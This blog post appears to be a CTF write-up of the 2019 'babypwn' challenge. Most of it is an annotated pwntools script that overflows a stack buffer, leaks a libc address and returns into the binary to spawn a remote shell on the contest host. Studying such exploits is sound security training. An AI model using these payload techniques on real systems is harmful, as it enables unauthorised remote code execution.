
CTF-2019国赛线下赛

没有web手的悲剧

pwn

0x01 babypwn

附件下载 babypwn

from pwn import *
# Verbose pwntools I/O logging for every send/recv that follows.
context.log_level = "debug"
# Module-level placeholder; pwn() binds a *local* `sh`, so this value is never updated.
sh = 0
# Target binary and the libc build assumed for the remote host (per the filename);
# both are loaded from the current directory at import time. `elf` is not used by pwn().
elf = ELF("pwn")
lib = ELF("libc6_2.23-0ubuntu10_i386.so")
#nc 172.29.9.107 9999
def pwn(ip: str, port: int, debug: int) -> None:
    """Drive the babypwn solution against a local process or the remote service.

    Args:
        ip: host of the remote service (ignored when ``debug == 1``).
        port: TCP port of the remote service (ignored when ``debug == 1``).
        debug: ``1`` runs ``./pwn`` locally via ``process()``; any other value
            connects with ``remote(ip, port)``.

    Returns:
        None; the function ends in ``sh.interactive()``, handing the connection
        to the user.

    NOTE(review): the script appears to target Python 2 pwntools — str payloads
    are concatenated with ``p32()`` output and ``input()`` is used as a pause;
    under Python 3 the str/bytes concatenation below raises TypeError.
    """
    # `sh` is local here; the module-level `sh = 0` is shadowed, not updated.
    if(debug == 1):
        sh = process("./pwn")
    else:
        sh = remote(ip,port)
    # Gadget addresses kept for reference; neither is used by the payloads below.
    pop3_ret = 0x08048699
    pop2_ret = 0x0804869a
    # Distance from the start of the overflowed buffer to the saved return
    # address: every payload below places its final p32() at byte 44.
    offset = 44
    main_addr = 0x080485FF
    # Round 1: 32 filler bytes, 0x0804A01C, 8 junk bytes, main_addr at offset 44.
    # 0x0804A01C is presumably a .got.plt slot — the value read back further
    # down is treated as __libc_start_main's address — TODO confirm in the binary.
    payload = (offset-12) * 'a' + p32(0x0804A01C) + "2"*4 + "3"*4+ p32(main_addr)
    # The same payload is sent twice, each time waiting for the "Hello, " prompt;
    # why two rounds are needed is not visible from this script.
    sh.send(payload)
    sh.recvuntil("Hello, ")
    sh.send(payload)
    sh.recvuntil("Hello, ")
    # Round 2: 28 filler + 4 junk bytes, 0x0804A01C again, 8 junk bytes, then a
    # return into 0x0804861D at offset 44 (an in-binary address whose role is not
    # visible here).
    payload = (offset-0x10) * "b"+"5"*4 +p32(0x0804A01C)+"7"*4+"8"*4 +p32(0x0804861D)
    sh.send(payload)
    sh.recvuntil(payload)  # the service is expected to echo the payload back
    sh.send(payload)
    sh.recvuntil(payload)
    # Skip 33 bytes of the echoed response, then read the 4-byte leaked pointer.
    sh.recv(33)
    libc = u32(sh.recv(4))
    log.success("libc :" + hex(libc))
    # NOTE(review): `system` is an address inside the binary and is unused; the
    # final round hard-codes 0x08048559 directly.
    system = 0x08048559
    # Rebase: treat the leak as __libc_start_main's runtime address and add the
    # offset of a "/bin/sh" string in the libc build loaded as `lib`.
    binsh = libc - lib.symbols["__libc_start_main"] + next(lib.search("/bin/sh"))
    log.success("binsh :"+hex(binsh))
    # Logged for reference only; the libc-based system address is never used.
    log.success("system :"+hex(libc - lib.symbols["__libc_start_main"] + lib.symbols['system']))
    # Pauses until a line is read from stdin (under Python 2, input() also evaluates it).
    input()
    # 44 filler bytes, then a return into 0x08048450 (in-binary address; purpose
    # not visible here).
    payload = (offset)*"a" + p32(0x08048450)
    sh.send(payload)
    # Round 3 mirrors round 1 with the computed "/bin/sh" address in the slot that
    # previously held 0x0804A01C; 0x080485FF is main_addr.
    payload = (offset-12) * 'a' + p32(binsh) + "2"*4 + "3"*4+ p32(0x080485FF)
    sh.send(payload)
    sh.recvuntil("Hello, ")
    sh.send(payload)
    sh.recvuntil("Hello, ")
    # Round 4 mirrors round 2, now returning into 0x08048559 with binsh in the
    # same slot.
    payload = (offset-0x10) * "b"+"5"*4 +p32(binsh)+"7"*4+"8"*4 +p32(0x08048559)
    sh.send(payload)
    sh.recvuntil("Hello, ")
    # NOTE(review): sendline() here appends "\n" (the other rounds use send()),
    # and the prompt is matched without its trailing space — both differ from
    # the earlier rounds; presumably deliberate, but worth confirming.
    sh.sendline(payload)
    sh.recvuntil("Hello,")
    sh.interactive()
if __name__ == "__main__":
    # Script entry: run the solution against the remote CTF service (debug=0).
    pwn(ip="172.29.9.107", port=9999, debug=0)
文章作者: 咲夜南梦
文章链接: http://yoursite.com/2019/06/28/CTF-2019%E5%9B%BD%E8%B5%9B%E7%BA%BF%E4%B8%8B%E8%B5%9B/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 咲夜南梦's 博客
